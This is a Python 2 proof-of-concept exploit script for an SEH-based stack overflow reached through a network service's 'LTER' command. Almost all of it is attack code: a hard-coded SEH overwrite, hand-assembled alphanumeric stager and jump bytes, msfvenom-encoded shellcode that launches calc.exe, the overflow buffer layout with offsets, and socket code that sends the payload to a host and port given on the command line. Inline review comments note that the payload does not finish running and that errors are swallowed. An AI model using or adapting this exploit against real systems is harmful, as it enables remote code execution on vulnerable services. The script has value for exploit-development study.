#!/usr/bin/env python
# Proof-of-concept for an SEH-based stack overflow reached through a service's
# "LTER" command; the author's offset notes are kept inline below.
# Python 2 syntax throughout (print statements, str-typed byte buffers).
# Usage: <script> HOST PORT -- there is no argument validation: a missing or
# non-numeric argument raises at the two assignments below, outside the try.
import socket
from struct import pack
import sys

host = sys.argv[1]
port = int(sys.argv[2])

# Hard-coded SEH handler address, packed little-endian ("<I"); NSEH is a
# literal 4-byte string.
seh = pack("<I", 0x6250172B)
nseh = "\x43\x43\x75\xff"

# End of D's BEFFFF
# Beginning of A's BEF230
# First aligned A at BEF239
# A's offset: DBF (-3519 bytes)
# ESP offset from D's: 11AF (-4527 bytes)
stager = "\x54\x58" # push esp, pop eax
stager += "\x66\x05\x7f\x11" # add ax, 0x1170 | 4464 bytes
stager += "\x50\x5c" # push eax, pop esp

"""
jmp2buff asm
nasm > mov ebx, esp
00000000 89E3 mov ebx,esp
nasm > sub bx, 0xdba
00000000 6681EBBA0D sub bx,0xdba
nasm > sub bx, 0xd8a
00000000 6681EB8A0D sub bx,0xd8a
nasm > push ebx
00000000 53 push ebx
nasm > pop esp
00000000 5C pop esp
nasm > call esp
00000000 FFD4 call esp
"""
# Byte string built one instruction at a time; the author's disassembly of
# each chunk is on the right.
jmp2buff = ""
jmp2buff += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
jmp2buff += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
jmp2buff += "\x05\x36\x77\x63\x41" ## add eax, 0x41637736
jmp2buff += "\x05\x35\x66\x62\x41" ## add eax, 0x41626635
jmp2buff += "\x05\x24\x55\x42\x41" ## add eax, 0x41425524
jmp2buff += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
jmp2buff += "\x50" ## push eax
jmp2buff += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
jmp2buff += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
jmp2buff += "\x05\x76\x45\x07\x32" ## add eax, 0x32074576
jmp2buff += "\x05\x75\x45\x06\x21" ## add eax, 0x21064575
jmp2buff += "\x50" ## push eax
jmp2buff += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
jmp2buff += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
jmp2buff += "\x05\x45\x72\x33\x41" ## add eax, 0x41337245
jmp2buff += "\x05\x44\x71\x33\x40" ## add eax, 0x40337144
jmp2buff += "\x50" ## push eax

# msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -b '\x00' -e x86/alpha_mixed BufferRegister=ESP -f c
# shellcode gets loaded into ESP, then called, and ends up dying 3/4 of the way through in a recursive SEH chain
# NOTE(review): per the author's own comment the payload does not run to
# completion on the target described, so this is a partial PoC as written.
shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
             "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
             "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
             "\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x6d\x38\x4d\x52\x57\x70"
             "\x75\x50\x35\x50\x71\x70\x6e\x69\x4a\x45\x75\x61\x49\x50\x62"
             "\x44\x4e\x6b\x66\x30\x74\x70\x4c\x4b\x43\x62\x34\x4c\x6e\x6b"
             "\x36\x32\x47\x64\x4e\x6b\x54\x32\x76\x48\x54\x4f\x4c\x77\x43"
             "\x7a\x77\x56\x45\x61\x6b\x4f\x6c\x6c\x45\x6c\x70\x61\x43\x4c"
             "\x45\x52\x56\x4c\x75\x70\x39\x51\x78\x4f\x54\x4d\x65\x51\x49"
             "\x57\x68\x62\x78\x72\x36\x32\x71\x47\x4c\x4b\x52\x72\x72\x30"
             "\x4e\x6b\x42\x6a\x45\x6c\x6e\x6b\x70\x4c\x52\x31\x43\x48\x6a"
             "\x43\x67\x38\x55\x51\x78\x51\x52\x71\x6e\x6b\x36\x39\x65\x70"
             "\x47\x71\x79\x43\x4e\x6b\x43\x79\x72\x38\x49\x73\x37\x4a\x77"
             "\x39\x4e\x6b\x30\x34\x6c\x4b\x75\x51\x79\x46\x46\x51\x59\x6f"
             "\x4c\x6c\x69\x51\x4a\x6f\x66\x6d\x33\x31\x6b\x77\x46\x58\x4d"
             "\x30\x34\x35\x4c\x36\x33\x33\x31\x6d\x6c\x38\x45\x6b\x61\x6d"
             "\x54\x64\x42\x55\x69\x74\x70\x58\x4e\x6b\x73\x68\x55\x74\x36"
             "\x61\x7a\x73\x35\x36\x4c\x4b\x64\x4c\x50\x4b\x4e\x6b\x50\x58"
             "\x47\x6c\x67\x71\x5a\x73\x6c\x4b\x66\x64\x6c\x4b\x47\x71\x6a"
             "\x70\x4e\x69\x53\x74\x65\x74\x57\x54\x43\x6b\x31\x4b\x63\x51"
             "\x50\x59\x73\x6a\x53\x61\x79\x6f\x49\x70\x71\x4f\x61\x4f\x50"
             "\x5a\x6e\x6b\x46\x72\x78\x6b\x6e\x6d\x73\x6d\x51\x7a\x46\x61"
             "\x6c\x4d\x4f\x75\x4e\x52\x77\x70\x67\x70\x65\x50\x42\x70\x50"
             "\x68\x36\x51\x6e\x6b\x70\x6f\x6b\x37\x69\x6f\x48\x55\x6f\x4b"
             "\x49\x70\x37\x6d\x54\x6a\x34\x4a\x31\x78\x4d\x76\x4a\x35\x4f"
             "\x4d\x4d\x4d\x59\x6f\x6b\x65\x65\x6c\x34\x46\x43\x4c\x75\x5a"
             "\x4f\x70\x49\x6b\x6b\x50\x33\x45\x63\x35\x6f\x4b\x62\x67\x47"
             "\x63\x44\x32\x30\x6f\x62\x4a\x67\x70\x51\x43\x79\x6f\x78\x55"
             "\x71\x73\x61\x71\x30\x6c\x52\x43\x34\x6e\x42\x45\x54\x38\x73"
             "\x55\x63\x30\x41\x41")

# Overflowed with lter.spk "LTER /.:/(3520 A's)"
# NSEH overwritten at 3495
# SEH overwritten at 3499
# Request layout, in order: command prefix, 4-byte filler, shellcode, filler,
# stager, jmp2buff, filler, NSEH, SEH, then "D" padding sized so that
# nseh + seh + padding is exactly 1000 bytes.
# From a detection standpoint the on-wire observable is the literal
# "LTER /.:/" prefix followed by several KB dominated by 0x41 ("A") runs.
buffer = "LTER /.:/"
buffer += "A"*4
buffer += shellcode
buffer += "A"*2927
buffer += stager
buffer += jmp2buff
buffer += "A"*43
buffer += nseh
buffer += seh
buffer += "D"*(1000-len(nseh)-len(seh))

try:
    print "[+] Connecting to target"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    # Reads and discards up to 1024 bytes before sending -- presumably the
    # service greets on connect; verify against the target.
    s.recv(1024)
    # Printed before the send call actually runs.
    print "[+] Sent payload with length: %d" % len(buffer)
    s.send(buffer)
    s.close()
except:
    # NOTE(review): bare except swallows every error (failed connect, timeout,
    # even KeyboardInterrupt) without reporting the cause, and the socket is
    # only closed on the success path. Catching socket.error and printing the
    # exception would make failures diagnosable.
    print "[-] Something went wrong :("